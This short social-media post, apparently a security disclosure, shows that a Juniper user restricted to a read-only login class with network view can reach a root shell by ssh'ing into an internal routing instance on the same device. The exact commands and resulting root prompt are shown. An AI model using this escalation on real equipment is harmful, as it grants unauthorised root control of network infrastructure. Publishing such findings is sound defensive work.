papryk (@patryk@hackerspace.pl)
social.hackerspace.pl
yo dawg, i heard u like principle of least privilege root@some-juniper-box.foo.bar> show configuration system login class read-only-with-network permissions [ network view ]; root@some-juniper-box.foo.bar> show configuration system login user support-guy class class read-only-with-network; * few minutes later * support-guy@some-juniper-box.foo.bar> ssh routing-instance __juniper_private4__ root@192.168.1.1 root@localhost:~# uname -sr Linux 4.1.27-rt30-WR8.0.0.25_ovp

A “Support” tech with limited privileges can elevate to root shell just by ssh’ing to the same box.